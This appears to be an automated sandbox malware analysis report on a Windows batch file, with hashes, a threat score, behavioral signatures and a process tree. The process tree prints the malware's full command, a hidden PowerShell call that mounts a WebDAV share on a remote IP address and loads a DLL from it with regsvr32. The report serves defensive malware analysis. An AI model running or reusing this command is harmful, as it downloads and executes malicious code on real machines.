Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
19-07-2024 12:53
Static task
static1
Behavioral task
behavioral1
Sample
185433064283317791.bat
Resource
win7-20240704-en
windows7-x64
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
185433064283317791.bat
Resource
win10v2004-20240709-en
windows10-2004-x64
8 signatures
150 seconds
General
-
Target
185433064283317791.bat
-
Size
2KB
-
MD5
6c9c31b3cc14e99f689c656d5a36a3b1
-
SHA1
e7dc9fdf08e24b8bb099f17a59974227f1de3628
-
SHA256
5755e51681dc4dd756938eb022aaa64389e45970a7bad48720dae02ab4076e50
-
SHA512
b275a981604d07376d4f0313636362a0db81346f626c22dee84890874d86d8a51ad805e20373c9886868e11c73e4f04614b4aab80125f6bc05f40689cdb8ca22
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3028 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3028 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2656 wordpad.exe 2656 wordpad.exe 2656 wordpad.exe 2656 wordpad.exe 2656 wordpad.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2784 wrote to memory of 2656 2784 cmd.exe 32 PID 2784 wrote to memory of 2656 2784 cmd.exe 32 PID 2784 wrote to memory of 2656 2784 cmd.exe 32 PID 2784 wrote to memory of 3028 2784 cmd.exe 33 PID 2784 wrote to memory of 3028 2784 cmd.exe 33 PID 2784 wrote to memory of 3028 2784 cmd.exe 33 PID 3028 wrote to memory of 2688 3028 powershell.exe 35 PID 3028 wrote to memory of 2688 3028 powershell.exe 35 PID 3028 wrote to memory of 2688 3028 powershell.exe 35 PID 3028 wrote to memory of 2612 3028 powershell.exe 36 PID 3028 wrote to memory of 2612 3028 powershell.exe 36 PID 3028 wrote to memory of 2612 3028 powershell.exe 36 PID 3028 wrote to memory of 2612 3028 powershell.exe 36 PID 3028 wrote to memory of 2612 3028 powershell.exe 36
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\185433064283317791.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\126951871630094.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:2688
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\126951871630094.dll3⤵PID:2612
-
-